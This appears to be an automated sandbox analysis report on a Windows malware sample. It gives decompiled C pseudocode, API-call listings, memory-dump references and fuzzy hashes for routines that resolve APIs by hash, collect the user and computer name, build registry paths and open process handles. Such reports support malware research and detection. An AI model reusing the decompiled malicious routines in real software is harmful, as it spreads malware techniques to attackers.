Part of subcall function 02C87E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C88112), ref: 02C87E2C

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02C84F08,?,00000001,?,?,00000000,00000000), ref: 02C848BB
GetProcAddress.KERNEL32(00000000,7243775A), ref: 02C848DD
GetProcAddress.KERNEL32(00000000,614D775A), ref: 02C848F3
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02C84909
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02C8491F
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02C84935

Part of subcall function 02C86582: memset.NTDLL ref: 02C86601

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 1946cec231449c2ec49aeb033ecc74286d37fc296f5f7e27fe423cd25c59bc86
Instruction ID: 49b814f486ad3a3f9121be3541b4b7dc358982f1a14c73dd70ba2ffaa8d70404
Opcode Fuzzy Hash: 1946cec231449c2ec49aeb033ecc74286d37fc296f5f7e27fe423cd25c59bc86
Instruction Fuzzy Hash: 6321FB71A006079FD720EF69DC84A5AB7ECEF44748B018566E649DB251D770EA05CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C4BCB, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6D4C4BF3

Part of subcall function 6D4C1407: __getptd.LIBCMT ref: 6D4C1415
Part of subcall function 6D4C1407: __getptd.LIBCMT ref: 6D4C1423

__getptd.LIBCMT ref: 6D4C4BFD

Part of subcall function 6D4C3307: __getptd_noexit.LIBCMT ref: 6D4C330A
Part of subcall function 6D4C3307: __amsg_exit.LIBCMT ref: 6D4C3317

__getptd.LIBCMT ref: 6D4C4C0B
__getptd.LIBCMT ref: 6D4C4C19
__getptd.LIBCMT ref: 6D4C4C24
_CallCatchBlock2.LIBCMT ref: 6D4C4C4A

Part of subcall function 6D4C14AC: __CallSettingFrame@12.LIBCMT ref: 6D4C14F8

Part of subcall function 6D4C4CF1: __getptd.LIBCMT ref: 6D4C4D00
Part of subcall function 6D4C4CF1: __getptd.LIBCMT ref: 6D4C4D0E

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: d22a1b97de8c1ad67e1874cb9b0ad41211ce3527959c21de219fc3ba20ff4d96
Instruction ID: a790352a6dc8fd3395c8c486d7777da748c9ef880dda594d97267d228449273c
Opcode Fuzzy Hash: d22a1b97de8c1ad67e1874cb9b0ad41211ce3527959c21de219fc3ba20ff4d96
Instruction Fuzzy Hash: 4A11C6B9D042499FDF00DFA4C548FADBBB0FF08318F118469E914A7260DB389E159F95

Uniqueness

Uniqueness Score: -1.00%

Function 02C83F60, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02C83F60(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t85;
				void* _t95;
				void* _t96;
				char _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t96 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x2c8d33c);
					_t95 = 0x80000002;
					L6:
					_t60 = E02C81546(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E02C8922B(_t96, _t101, _t105, _t95, _t60) != 0) {
						L27:
						E02C8A5FA(_a8);
						goto L29;
					}
					_t65 =  *0x2c8d2a4; // 0x245a5a8
					_t16 = _t65 + 0x2c8e8fe; // 0x65696c43
					_t68 = E02C81546(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t69 =  *_t29;
						_t33 = _t105 + 0x10; // 0x3d02c8c0
						if(E02C84413(_t101,  *_t33, _t95, _a8,  *0x2c8d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)(_t69 + 0x2c))) == 0) {
							_t71 =  *0x2c8d2a4; // 0x245a5a8
							if(_t102 == 0) {
								_t35 = _t71 + 0x2c8ea5f; // 0x4d4c4b48
								_t72 = _t35;
							} else {
								_t34 = _t71 + 0x2c8e89f; // 0x55434b48
								_t72 = _t34;
							}
							if(E02C84744(_t72,  *0x2c8d334,  *0x2c8d338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t74 =  *0x2c8d2a4; // 0x245a5a8
									_t44 = _t74 + 0x2c8e871; // 0x74666f53
									_t103 = E02C81546(0, _t44);
									if(_t77 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d02c8c0
										E02C827A2( *_t47, _t95, _a8,  *0x2c8d338, _a24);
										_t49 = _t105 + 0x10; // 0x3d02c8c0
										E02C827A2( *_t49, _t95, _t103,  *0x2c8d330, _a16);
										E02C8A5FA(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d02c8c0
									E02C827A2( *_t40, _t95, _a8,  *0x2c8d338, _a24);
									_t43 = _t105 + 0x10; // 0x3d02c8c0
									E02C827A2( *_t43, _t95, _a8,  *0x2c8d330, _a16);
								}
								if( *_t105 != 0) {
									E02C8A5FA(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d02c8c0
					_t85 = E02C85AF6( *_t21, _t95, _a8, _t68,  &_v16,  &_v12);
					if(_t85 == 0) {
						_t104 = _v16;
						if(_v12 == 0x28) {
							 *_t104 =  *_t104 & _t85;
							_t26 = _t105 + 0x10; // 0x3d02c8c0
							E02C84413(_t101,  *_t26, _t95, _a8, _a24, _t104, 0x28);
						}
						E02C8A5FA(_t104);
						_t102 = _a16;
					}
					E02C8A5FA(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t101 = _a8;
					E02C8A88E(_t102, _a8,  &_v284);
					__imp__(_t106 + _t102 - 0x117,  *0x2c8d33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t95 = 0x80000003;
					goto L6;
				}
			}

0x02c83f60
0x02c83f69
0x02c83f70
0x02c83f75
0x02c83fe2
0x02c83fe8
0x02c83fed
0x02c83ff6
0x02c83ffb
0x02c84000
0x02c84173
0x02c8417a
0x02c8417a
0x02c8417f
0x02c84181
0x02c84181
0x02c8418a
0x02c8418a
0x02c84006
0x02c84012
0x02c84169
0x02c8416c
0x00000000
0x02c8416c
0x02c84018
0x02c8401d
0x02c84026
0x02c8402b
0x02c84030
0x02c84079
0x02c84079
0x02c84079
0x02c8408c
0x02c84096
0x02c8409c
0x02c840a3
0x02c840ad
0x02c840ad
0x02c840a5
0x02c840a5
0x02c840a5
0x02c840a5
0x02c840cf
0x02c840d7
0x02c84105
0x02c8410a
0x02c84118
0x02c8411c
0x02c8414e
0x02c8411e
0x02c8412b
0x02c8412e
0x02c8413e
0x02c84141
0x02c84147
0x02c84147
0x02c840d9
0x02c840e6
0x02c840e9
0x02c840fb
0x02c840fe
0x02c840fe
0x02c84158
0x02c84164
0x02c8415a
0x02c8415d
0x02c8415d
0x02c84158
0x02c840cf
0x00000000
0x02c84096
0x02c8403f
0x02c84042
0x02c84049
0x02c8404f
0x02c84052
0x02c84054
0x02c84060
0x02c84063
0x02c84063
0x02c84069
0x02c8406e
0x02c8406e
0x02c84074
0x00000000
0x02c84074
0x02c83f7a
0x00000000
0x02c83fa1
0x02c83fa1
0x02c83fad
0x02c83fc0
0x02c83fc6
0x02c83fce
0x00000000
0x02c83fce

APIs

StrChrA.SHLWAPI(02C886C4,0000005F,00000000,00000000,00000104), ref: 02C83F93
lstrcpy.KERNEL32(?,?), ref: 02C83FC0

Part of subcall function 02C81546: lstrlen.KERNEL32(?,00000000,02C8D330,00000001,02C867F7,02C8D00C,02C8D00C,00000000,00000005,00000000,00000000,?,?,?,02C841AA,02C85D90), ref: 02C8154F
Part of subcall function 02C81546: mbstowcs.NTDLL ref: 02C81576
Part of subcall function 02C81546: memset.NTDLL ref: 02C81588

Part of subcall function 02C827A2: lstrlenW.KERNEL32(?,?,?,02C84133,3D02C8C0,80000002,02C886C4,02C82F48,74666F53,4D4C4B48,02C82F48,?,3D02C8C0,80000002,02C886C4,?), ref: 02C827C7

Part of subcall function 02C8A5FA: HeapFree.KERNEL32(00000000,00000000,02C881B4,00000000,?,?,00000000), ref: 02C8A606

lstrcpy.KERNEL32(?,00000000), ref: 02C83FE2

Strings

\, xrefs: 02C83FC6
(, xrefs: 02C8404B

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 10c0b288a4284a84065ab9a31155cab4aeac061172db6d96aae66ea1c5a6928a
Instruction ID: 817ba99ba7675a0373b920c302b6bf2c7795f094c2285726099e4302f663d616
Opcode Fuzzy Hash: 10c0b288a4284a84065ab9a31155cab4aeac061172db6d96aae66ea1c5a6928a
Instruction Fuzzy Hash: 57515A7250020AEFCF25BFA1DD40EAA3BBAEF48318F00C525FA1696160D731DA25EF51

Uniqueness

Uniqueness Score: -1.00%

Function 02C81363, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C81363() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E02C87E20(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02C8A5FA(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2c82a02
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x02c81371
0x02c81374
0x02c81377
0x02c8137d
0x02c81382
0x02c81388
0x02c81390
0x02c81393
0x02c81399
0x02c8139e
0x02c813ab
0x02c813b8
0x02c813bc
0x02c813be
0x02c813c2
0x02c813c5
0x02c813d5
0x02c81428
0x02c81429
0x02c813d7
0x02c813dc
0x02c813dd
0x02c813e2
0x02c813e5
0x02c813f8
0x00000000
0x02c813fa
0x02c813fd
0x02c81402
0x02c81410
0x02c81413
0x02c81419
0x02c8141e
0x00000000
0x02c81420
0x02c81420
0x02c81423
0x02c81423
0x02c8141e
0x02c813f8
0x02c8142e
0x02c8142f
0x02c8139e
0x02c81435

APIs

GetUserNameW.ADVAPI32(00000000,02C82A00), ref: 02C81377
GetComputerNameW.KERNEL32(00000000,02C82A00), ref: 02C81393

Part of subcall function 02C87E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C88112), ref: 02C87E2C

GetUserNameW.ADVAPI32(00000000,02C82A00), ref: 02C813CD
GetComputerNameW.KERNEL32(02C82A00,?), ref: 02C813F0
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02C82A00,00000000,02C82A02,00000000,00000000,?,?,02C82A00), ref: 02C81413

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 16b6c848fb5ea3937770ad67e87d3836c3976788dc32f55ba45700421d88d42f
Instruction ID: 662d616e0f0de6ef03c0b08c8e6f874207874ee4549d9e752fe50b8f6b554411
Opcode Fuzzy Hash: 16b6c848fb5ea3937770ad67e87d3836c3976788dc32f55ba45700421d88d42f
Instruction Fuzzy Hash: B721FA76900208FFCB11DFE4D984DAEBBF9EF84348B54856AE605E7240D7309B45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C3880, Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6D4C388C

Part of subcall function 6D4C3307: __getptd_noexit.LIBCMT ref: 6D4C330A
Part of subcall function 6D4C3307: __amsg_exit.LIBCMT ref: 6D4C3317

__amsg_exit.LIBCMT ref: 6D4C38AC
__lock.LIBCMT ref: 6D4C38BC
InterlockedDecrement.KERNEL32(?), ref: 6D4C38D9
InterlockedIncrement.KERNEL32(6D4F3DA8), ref: 6D4C3904

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 400319c8366a1f39a0e00ada6c0bb172479757ac195dc247ea4e0cd77d4f2185
Instruction ID: dc67b0b2989b4fd147482865fc31bb01738eaae2fe2f580796008a79bec173b4
Opcode Fuzzy Hash: 400319c8366a1f39a0e00ada6c0bb172479757ac195dc247ea4e0cd77d4f2185
Instruction Fuzzy Hash: 6501843D905722ABDF21EBA5844DF5D77B0AF85718F114059E85467390CB349D41CBE3

Uniqueness

Uniqueness Score: -1.00%

Function 02C85722, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02C85722(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02C88389(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02C8A961(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x2c8d12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x02c85722
0x02c8572f
0x02c85731
0x02c85794
0x00000000
0x02c85794
0x02c85749
0x02c85750
0x02c8575c
0x02c85761
0x02c85763
0x02c85765
0x02c85767
0x02c85769
0x02c8576b
0x02c85777
0x02c85787
0x00000000
0x02c85779
0x02c85779
0x02c85780
0x02c8578d
0x02c8578d
0x02c8578d
0x02c85780
0x02c85777
0x02c85792
0x00000000
0x00000000
0x02c85798

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,02C86187,?,?,00000000,00000000), ref: 02C8575C
ResetEvent.KERNEL32(?), ref: 02C85761
GetLastError.KERNEL32 ref: 02C85779
GetLastError.KERNEL32(?,?,00000102,02C86187,?,?,00000000,00000000), ref: 02C85794

Part of subcall function 02C88389: lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,02C85741,?,?,?,?,00000102,02C86187,?,?,00000000), ref: 02C88395
Part of subcall function 02C88389: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02C85741,?,?,?,?,00000102,02C86187,?), ref: 02C883F3
Part of subcall function 02C88389: lstrcpy.KERNEL32(00000000,00000000), ref: 02C88403

SetEvent.KERNEL32(?), ref: 02C85787

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 78d4d044e79b079171e01aa2485b062aa804251537ff67384796c6760c78d596
Instruction ID: 6952283a89c86a122703a39d284add900c2cb677ba20041f3c934edbd7cd4dbc
Opcode Fuzzy Hash: 78d4d044e79b079171e01aa2485b062aa804251537ff67384796c6760c78d596
Instruction Fuzzy Hash: 6B016D31124211EFD7317A71DC44F2BBAA9AF843ACF62CB26F552A10E0D7B1E914DA64

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C0157, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 6D4C0175

Part of subcall function 6D4C1B7E: __mtinitlocknum.LIBCMT ref: 6D4C1B94
Part of subcall function 6D4C1B7E: __amsg_exit.LIBCMT ref: 6D4C1BA0
Part of subcall function 6D4C1B7E: RtlEnterCriticalSection.NTDLL(?), ref: 6D4C1BA8

___sbh_find_block.LIBCMT ref: 6D4C0180
___sbh_free_block.LIBCMT ref: 6D4C018F
HeapFree.KERNEL32(00000000,?,6D4F1A28,0000000C,6D4C1B5F,00000000,6D4F1AF8,0000000C,6D4C1B99,?,?,?,6D4C7A94,00000004,6D4F1E48,0000000C), ref: 6D4C01BF
GetLastError.KERNEL32(?,6D4C7A94,00000004,6D4F1E48,0000000C,6D4C58CA,?,?,00000000,00000000,00000000,?,6D4C32B9,00000001,00000214), ref: 6D4C01D0

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 3dffd6c8d060f9b8058af5940c881d13140e988247bc967d7c21ce1a68240fd4
Instruction ID: 8c216e8a47bdf9d1767214d04c1e279701f3c4059f743c0bb02103fe56f16591
Opcode Fuzzy Hash: 3dffd6c8d060f9b8058af5940c881d13140e988247bc967d7c21ce1a68240fd4
Instruction Fuzzy Hash: A401A2B9909312EAEF21AFB28904F5E7774AF01369F21410DE60476284DF358D41CAD7

Uniqueness

Uniqueness Score: -1.00%

Function 02C814CE, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C814CE(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2c8d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2c8d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2c8d258 = _t6;
					 *0x2c8d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2c8d254 = _t7;
					if(_t7 == 0) {
						 *0x2c8d254 =  *0x2c8d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x02c814d6
0x02c814dc
0x02c814e3
0x00000000
0x02c8153d
0x02c814e5
0x02c814ed
0x02c814fa
0x02c814fa
0x02c8153a
0x00000000
0x02c8153a
0x02c814fc
0x02c814fc
0x02c81501
0x02c81513
0x02c81518
0x02c8151e
0x02c81524
0x02c8152b
0x02c8152d
0x02c8152d
0x00000000
0x02c81534
0x02c814f6
0x00000000
0x00000000
0x02c814f8
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02C85274,?,?,00000001,?,?,?,02C8647E,?), ref: 02C814D6
GetVersion.KERNEL32(?,00000001,?,?,?,02C8647E,?), ref: 02C814E5
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02C8647E,?), ref: 02C81501
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02C8647E,?), ref: 02C8151E
GetLastError.KERNEL32(?,00000001,?,?,?,02C8647E,?), ref: 02C8153D

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: d28485981719ff78272ad9502150da2aa1d54bcce3c38cb690960df629545c6a
Instruction ID: fbc0f9a7c9cc427b56a8bb0e61888034fb717f520b30d986a436bcf528ca2563
Opcode Fuzzy Hash: d28485981719ff78272ad9502150da2aa1d54bcce3c38cb690960df629545c6a
Instruction Fuzzy Hash: 4AF0D1B09C03429BD754AB34BC09B153BE0A780388F10CB16E50BC71C0D7B0C662CB26

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BDE60, Relevance: 6.3, APIs: 4, Instructions: 282COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 6D4BDF3A
_realloc.LIBCMT ref: 6D4BDFD8
_realloc.LIBCMT ref: 6D4BE07F

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: _realloc
String ID:
API String ID: 1750794848-0
Opcode ID: 6c93915bcfa9a75ff5b094a40c617c11b7f6c72d845d652a0226990594a4fbdd
Instruction ID: f6a92f4a35915f3fccea1133e43a1cf19909493f045af0c506cfec6f7849dd2f
Opcode Fuzzy Hash: 6c93915bcfa9a75ff5b094a40c617c11b7f6c72d845d652a0226990594a4fbdd
Instruction Fuzzy Hash: 69B1A0B46087059FC314CF28C880A26BBF1FF9A204F5486ADD59A87711E731ED46CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BCE60, Relevance: 6.2, APIs: 4, Instructions: 176COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 6D4BCEFD
_realloc.LIBCMT ref: 6D4BCF3E
_realloc.LIBCMT ref: 6D4BCF81
_realloc.LIBCMT ref: 6D4BCFC3

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: _realloc
String ID:
API String ID: 1750794848-0
Opcode ID: f016abb8cfb33c754151cff0e7ad3af76a70dce89f01932e5d6cea4e4b358287
Instruction ID: 3bd23232e9648252017c6c6b12b2463bafb8aadf2d6c95a0afce9228d50ea0e9
Opcode Fuzzy Hash: f016abb8cfb33c754151cff0e7ad3af76a70dce89f01932e5d6cea4e4b358287
Instruction Fuzzy Hash: 4171E4B1A04B058FC360CF29C480916FBF1FF99314B518A6EE48A87A51E771F946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C85E3C, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02C85E3C(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2c8d2a4; // 0x245a5a8
					_t5 = _t103 + 0x2c8e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2c8c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2c8d2a4; // 0x245a5a8
												_t28 = _t109 + 0x2c8e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2c8d2a4; // 0x245a5a8
														_t33 = _t79 + 0x2c8e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x02c85e41
0x02c85e4a
0x02c85e4b
0x02c85e4f
0x02c85e55
0x02c85e5b
0x02c85e64
0x02c85e6a
0x02c85e74
0x02c85e76
0x02c85e7c
0x02c85e81
0x02c85e8c
0x02c85e92
0x02c85e97
0x02c85fb9
0x02c85e9d
0x02c85e9d
0x02c85eaa
0x02c85eb0
0x02c85eb6
0x02c85eba
0x02c85ec0
0x02c85ecd
0x02c85ed1
0x02c85ed7
0x02c85eda
0x02c85ee2
0x02c85ee3
0x02c85ee7
0x02c85eeb
0x02c85eee
0x02c85ef1
0x02c85ef7
0x02c85f00
0x02c85f06
0x02c85f07
0x02c85f0a
0x02c85f0b
0x02c85f0c
0x02c85f14
